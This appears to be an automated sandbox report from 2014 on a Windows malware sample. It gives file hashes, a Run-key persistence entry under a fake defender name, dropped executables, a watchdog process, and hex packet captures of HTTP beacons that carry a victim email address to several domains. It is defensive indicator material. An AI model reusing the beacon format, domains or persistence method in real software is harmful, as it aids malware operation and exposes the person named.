Analysis Date2014-09-19 03:45:45

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: 532912182e497a0612e9cd2a57364714 sha1: 6870138e28dffa57b7e178d475dc5e9892dd9b47 size: 295936
Section.rdata md5: 15f2c5f4bf43cc26330b9d5f7a148af2 sha1: 7ffcc1ccce24472d6e6d735f2d7f5411f5ab5d95 size: 35328 md5: 8f6812085c00d5a11708bd6f4fd6d2c8 sha1: 38827995fa31e3b866d673ad5fe25910723649cb size: 108544
Timestamp2014-07-24 05:34:23
PackerMicrosoft Visual C++ ?.?

Runtime Details:


↳ C:\malware.exe

RegistryHKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Human Defender Engine Resource Publication Proxy ➝
C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe
Creates FileC:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe
Creates ProcessC:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe

↳ C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe

Creates FileC:\Documents and Settings\Administrator\Application Data\gksihqj\
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\gksihqj\qpojtlphefu.exe
Creates ProcessWATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\gksihqj\ahwuleydcihz.exe"

Network Details:
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Type: A
Flows TCP192.168.1.1:1031 ➝
Flows TCP192.168.1.1:1032 ➝
Flows TCP192.168.1.1:1033 ➝
Flows TCP192.168.1.1:1034 ➝
Flows TCP192.168.1.1:1035 ➝
Flows TCP192.168.1.1:1036 ➝
Flows TCP192.168.1.1:1037 ➝
Flows TCP192.168.1.1:1038 ➝
Flows TCP192.168.1.1:1039 ➝
Flows TCP192.168.1.1:1040 ➝

Raw Pcap
0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 71756965 74737061   ..Host: quietspa
0x00000070 (00112)   63652e6e 65740d0a 0d0a      

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 7468696e 6b626579   ..Host: thinkbey
0x00000070 (00112)   6f6e642e 6e65740d 0a0d0a    

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 70726573 656e7462   ..Host: presentb
0x00000070 (00112)   65696e67 2e6e6574 0d0a0d0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 63686965 66626569   ..Host: chiefbei
0x00000070 (00112)   6e672e6e 65740d0a 0d0a0d0a  

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 7477656c 7665666f   ..Host: twelvefo
0x00000070 (00112)   72657665 722e6e65 740d0a0d 0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 68697374 6f727966   ..Host: historyf
0x00000070 (00112)   6f726576 65722e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 77656174 68657266   ..Host: weatherf
0x00000070 (00112)   6f726576 65722e6e 65740d0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 636c6173 73626579   ..Host: classbey
0x00000070 (00112)   6f6e642e 6e65740d 0a0d0a0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 7468696e 6b666c6f   ..Host: thinkflo
0x00000070 (00112)   7765722e 6e65740d 0a0d0a0a 0d0a

0x00000000 (00000)   47455420 2f696e64 65782e70 68703f65   GET /index.php?e
0x00000010 (00016)   6d61696c 3d6a6f73 6875612e 6d6f6f72   mail=joshua.moor
0x00000020 (00032)   65406174 7462692e 636f6d26 6d657468
0x00000030 (00048)   6f643d70 6f737420 48545450 2f312e30   od=post HTTP/1.0
0x00000040 (00064)   0d0a4163 63657074 3a202a2f 2a0d0a43   ..Accept: */*..C
0x00000050 (00080)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000060 (00096)   0d0a486f 73743a20 70726573 656e7466   ..Host: presentf
0x00000070 (00112)   6c6f7765 722e6e65 740d0a0d 0a0a

An application has made an attempt to load the C runtime library incorrectly.
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
bad allocation
bad exception
 Base Class Array'
BX}>B +
 Class Hierarchy Descriptor'
 Complete Object Locator'
`copy constructor closure'
dddd, MMMM dd, yyyy
`default constructor closure'
DOMAIN error
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector constructor iterator'
`eh vector copy constructor iterator'
`eh vector destructor iterator'
`eh vector vbase constructor iterator'
`eh vector vbase copy constructor iterator'
- floating point support not loaded
invalid string position
j@j ^V
`local static guard'
`local static thread guard'
`local vftable'
`local vftable constructor closure'
`managed vector constructor iterator'
`managed vector copy constructor iterator'
`managed vector destructor iterator'
Microsoft Visual C++ Runtime Library
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
`omni callsig'
`placement delete closure'
`placement delete[] closure'
Please contact the application's support team for more information.
<program name unknown>
- pure virtual function call
runtime error 
Runtime Error!
`scalar deleting destructor'
SING error
string too long
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
TLOSS error
 Type Descriptor'
`udt returning'
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
Unknown exception
`vbase destructor'
`vector constructor iterator'
`vector copy constructor iterator'
`vector deleting destructor'
`vector destructor iterator'
`vector vbase constructor iterator'
`vector vbase copy constructor iterator'
`virtual displacement map'
